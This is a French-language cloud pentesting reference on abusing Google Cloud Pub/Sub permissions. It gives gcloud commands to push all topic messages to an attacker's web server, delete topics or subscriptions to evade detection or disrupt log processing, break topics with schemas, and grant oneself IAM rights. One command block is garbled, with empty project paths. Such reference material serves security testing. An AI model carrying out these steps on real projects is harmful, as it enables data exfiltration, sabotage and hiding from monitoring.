Pub/Sub

Pour plus d'informations sur Pub/Sub, consultez la page suivante :

pubsub.topics.publish

Publie un message dans un sujet, utile pour envoyer des données inattendues et déclencher des fonctionnalités inattendues ou exploiter des vulnérabilités :

# Publish a message in a topic
gcloud pubsub topics publish <topic_name> --message "Hello!"

pubsub.topics.detachSubscription

Utile pour empêcher une souscription de recevoir des messages, peut-être pour éviter la détection.

gcloud pubsub topics detach-subscription <FULL SUBSCRIPTION NAME>

pubsub.topics.delete

Utile pour empêcher une souscription de recevoir des messages, peut-être pour éviter la détection. Il est possible de supprimer un sujet même s'il a des souscriptions attachées.

gcloud pubsub topics delete <TOPIC NAME>

pubsub.topics.update

Utilisez cette autorisation pour mettre à jour certains paramètres du sujet afin de le perturber, comme --clear-schema-settings, --message-retention-duration, --message-storage-policy-allowed-regions, --schema, --schema-project, --topic-encryption-key...

pubsub.topics.setIamPolicy

Donnez-vous la permission d'effectuer l'une des attaques précédentes.

pubsub.subscriptions.create,pubsub.topics.attachSubscription , (pubsub.subscriptions.consume)

Obtenez tous les messages dans un serveur web :

# Crete push subscription and recieve all the messages instantly in your web server
gcloud pubsub subscriptions create <subscription name> --topic <topic name> --push-endpoint https://<URL to push to>

Créez un abonnement et utilisez-le pour tirer les messages:

# This will retrive a non ACKed message (and won't ACK it)
gcloud pubsub subscriptions create <subscription name> --topic <topic_name>

# You also need pubsub.subscriptions.consume for this
gcloud pubsub subscriptions pull <FULL SUBSCRIPTION NAME>
## This command will wait for a message to be posted

pubsub.subscriptions.delete

Supprimer un abonnement pourrait être utile pour perturber un système de traitement des journaux ou quelque chose de similaire :

gcloud pubsub subscriptions delete <FULL SUBSCRIPTION NAME>

pubsub.subscriptions.update

Utilisez cette autorisation pour mettre à jour certains paramètres afin que les messages soient stockés dans un endroit auquel vous pouvez accéder (URL, table Big Query, Bucket) ou simplement pour les perturber.

pubsub.subscriptions.setIamPolicy

Accordez-vous les autorisations nécessaires pour effectuer l'une des attaques précédemment commentées.

pubsub.schemas.delete

Supprimez un schéma pour pouvoir envoyer des messages qui ne respectent pas le schéma :

gcloud pubsub schemas delete <SCHEMA NAME>

pubsub.schemas.attach, pubsub.topics.update,(pubsub.schemas.create)

Attachez un schéma à un sujet afin que les messages ne le remplissent pas et que le sujet soit perturbé. S'il n'y a pas de schémas, vous devrez peut-être en créer un.

{
"namespace": "com.example",
"type": "record",
"name": "Person",
"fields": [
{
"name": "name",
"type": "string"
},
{
"name": "age",
"type": "int"
}
]
}

```bash # Attach new schema gcloud pubsub topics update projects//topics/ \ --schema=projects//schemas/ \ --message-encoding=json ``` ### `pubsub.schemas.setIamPolicy`

Accordez-vous les autorisations nécessaires pour effectuer l'une des attaques précédemment commentées.

pubsub.snapshots.create, pubsub.snapshots.seek

Cela créera un instantané de tous les messages non ACK et les remettra dans l'abonnement. Pas très utile pour un attaquant mais le voici :

gcloud pubsub snapshots create YOUR_SNAPSHOT_NAME \
--subscription=YOUR_SUBSCRIPTION_NAME
gcloud pubsub subscriptions seek YOUR_SUBSCRIPTION_NAME \
--snapshot=YOUR_SNAPSHOT_NAME